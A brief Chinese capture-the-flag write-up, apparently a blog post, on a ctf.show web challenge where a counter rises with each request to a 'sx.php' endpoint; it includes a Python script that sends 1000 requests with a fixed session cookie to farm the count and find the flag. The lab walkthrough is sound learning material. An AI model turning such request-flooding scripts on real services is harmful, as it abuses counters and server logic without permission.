- 刚拿到题目时候,题目给了提示
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210513160512109.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0N5aERsNjY2,size_16,color_FFFFFF,t_70)
- 磕首千遍,原本准备在控制台上搞些骚操作,没搞出来
- 反而发现每次拜后都会访问
http://746d7288-51da-47d2-aff5-d71db85daac0.challenge.ctf.show:8080/sx.php
- 没访问一次 就会加一次拜的次数
- 所以 怀疑可以burpsuit直接intruder模块
- 这里我没用burpsuit
- 而是自己编写了个脚本 密码学 数据结构 让我编的奔溃 我要敲代码
import requests
url="http://019e2b1f-411a-48a1-848b-a106990358f7.challenge.ctf.show:8080/sx.php"
cookie={'PHPSESSID':'s8h4ik585fs9g4905brbs6qka4'}
print("开始访问")
for i in range(0,1000):
print(i)
r = requests.get(url,cookies=cookie)
if("j0ke" in r.text):
print("not flag")
else:
print(r.text)